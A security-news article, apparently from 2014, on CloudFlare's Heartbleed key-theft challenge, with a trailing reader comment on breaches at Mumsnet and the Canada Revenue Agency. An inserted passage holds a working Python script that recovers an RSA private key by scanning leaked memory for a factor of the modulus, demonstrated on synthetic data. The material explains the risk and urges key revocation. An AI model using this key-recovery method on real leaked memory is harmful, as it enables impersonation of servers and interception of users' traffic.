At the end of last week, engineers at CloudFlare said that they had been unable to exploit the Heartbleed bug to steal SSL keys from a server:
We’ve spent much of the time running extensive tests to figure out what can be exposed via Heartbleed and, specifically, to understand if private SSL key data was at risk.
Here’s the good news: after extensive testing on our software stack, we have been unable to successfully use Heartbleed on a vulnerable server to retrieve any private key data.
So, they set the internet a challenge – putting a test server online and inviting people to try to grab its private server keys by exploiting the so-called Heartbleed vulnerability in OpenSSL.
This site was created by CloudFlare engineers to be intentionally vulnerable to heartbleed. It is not running behind CloudFlare’s network. We encourage everyone to attempt to get the private key from this website. If someone is able to steal the private key from this site using heartbleed, we will post the full details here.
Well, they soon got an answer. And it wasn’t the good news we might have all wished for.
Within hours, software engineer Fedor Indutny was revealed to have recovered the private keys from the web server.
Just cracked @CloudFlare ’s challenge: https://t.co/8ZPSxyKF4D . I wonder when they’ll update the page.
— indutny (@indutny) April 11, 2014
Indutny said on Twitter that a script he wrote for the purpose took just three hours to hunt down the private SSL key.
CloudFlare confirmed Indutny's success, and speculated that a reboot of the server at one point might have contributed to the challenger's successful exfiltration of its secret key.
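The article does not say how Indutny's script worked, so the following is an added illustration written for this page (not code from the article, from CloudFlare's challenge or from Indutny) of one well-known way to turn a Heartbleed memory dump into a private key: OpenSSL keeps the RSA primes p and q in memory as BIGNUMs, so you slide a window of half the modulus length over the leaked bytes and test every candidate for dividing the public modulus N, which the attacker already has from the server's certificate. Everything here is constructed for the demo: the toy 512-bit key, the 64 KiB "leaked" buffer with one copy of p planted in it, and the assumption that the BIGNUM is laid out as little-endian bytes (OpenSSL's limb order on x86; a big-endian window is also tried to cover a DER-encoded copy).

```python
"""Recover an RSA private key from a Heartbleed-style memory leak by searching
the leaked bytes for a prime factor of the server's public modulus.

Added example, not code from the article, the CloudFlare challenge or
Indutny's script. The key, the leaked buffer and the BIGNUM byte order are
all constructed assumptions for the demo.
"""
import secrets


def is_probable_prime(n: int, rounds: int = 40) -> bool:
    """Miller-Rabin test; error probability is below 4**-rounds."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits: int) -> int:
    """Random prime with exactly `bits` bits (top bit set, odd)."""
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand


def generate_rsa(bits: int = 512, e: int = 65537):
    """Return (n, e, d, p, q) for a toy RSA key. 512 bits is far too small
    for real use; it keeps the demo fast and the layout identical."""
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        if p != q and (p - 1) % e and (q - 1) % e:
            break
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))
    return n, e, d, p, q


def fake_heartbleed_leak(p: int, total: int = 64 * 1024) -> bytes:
    """Constructed 64 KiB 'leak': random heap noise with one copy of p planted
    as OpenSSL holds it in a BIGNUM (assumed little-endian bytes, as on x86).
    This is not a real capture; a heartbeat response tops out at 64 KiB."""
    p_bytes = p.to_bytes((p.bit_length() + 7) // 8, "little")
    offset = secrets.randbelow(total - len(p_bytes))
    noise = bytearray(secrets.token_bytes(total))
    noise[offset:offset + len(p_bytes)] = p_bytes
    return bytes(noise)


def find_factor(leak: bytes, n: int):
    """Slide a window of half the modulus length over the leak and test each
    candidate, in both byte orders, for dividing n. Returns (p, q) or None."""
    width = (n.bit_length() + 7) // 8 // 2
    for i in range(len(leak) - width + 1):
        window = leak[i:i + width]
        for order in ("little", "big"):
            cand = int.from_bytes(window, order)
            # RSA primes have their top bit set; skip short or trivial values.
            if cand < 3 or cand.bit_length() < width * 8 - 8:
                continue
            if n % cand == 0:
                return cand, n // cand
    return None


def recover_private_exponent(n: int, e: int, leak: bytes):
    """Rebuild d = e^-1 mod (p-1)(q-1) once a factor is found, or None."""
    factors = find_factor(leak, n)
    if factors is None:
        return None
    p, q = factors
    return pow(e, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    n, e, d, p, q = generate_rsa()
    leak = fake_heartbleed_leak(p)
    print("private exponent recovered:", recover_private_exponent(n, e, leak) == d)
```

The scan is cheap: a 64 KiB response is about 65,000 windows, and each test is one modular division by N, so a real attacker's cost is dominated by how many heartbeat responses must be pulled before a chunk of heap that once held p or q comes back. That is also why a server that has just restarted, or whose key material is still sitting in freed heap near the TLS record buffers, is the worse case.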
One thing is clear. If you administer a server that ran a vulnerable OpenSSL and have so far put off revoking your SSL certificates and reissuing them with newly generated private keys (reissuing on the old key changes nothing if that key has already leaked), it might be time to think again.
If you don't, you could be putting your users and online customers in jeopardy.
Further reading:
- The NSA knew about Heartbleed bug for two years, claims report
- Heartbleed bug explained by xkcd in a way anyone can understand
- In the wake of Heartbleed, watch out for phishing attacks disguised as password reset emails
- Here’s some really bad Heartbleed bug advice about changing your passwords
- Heartbleed OpenSSL bug: An FAQ for Mac, iPhone and iPad users
- Did the Heartbleed bug leak your Yahoo password?
- The Heartbleed bug: serious vulnerability found in OpenSSL cryptographic software library
Yes… and interestingly, the BBC reports _this_ (today I guess, when I saw it anyway):
A leading UK site for parents and the Canadian tax authority have both announced they have had data stolen by hackers exploiting the Heartbleed bug.
Mumsnet – which says it has 1.5 million registered members – said that it believed that the cyber thieves may have obtained passwords and personal messages before it patched its site.
and
The Canada Revenue Agency said that 900 people's social insurance numbers had been stolen.
I cannot help but wonder why they were waiting around… then I snap back to what little reality I have and realise that most corporations, organisations and people in general do not take this type of thing seriously enough (I somehow doubt it was exploited right after it was made public … Mumsnet suggested that they found out last Friday). Especially shameful for the Canadian one, though (one can hope it isn't maybe the NSA that thought if they had social insurance numbers they could make use of it to prevent an ideal – terror etc. – just like everything else they do is given that reason)…
Either way, I guess both organisations will have to deal with it and that includes the major problems (misery and fear of consequences) for those it will affect (one can hope they both DO in fact take responsibility and address it appropriately).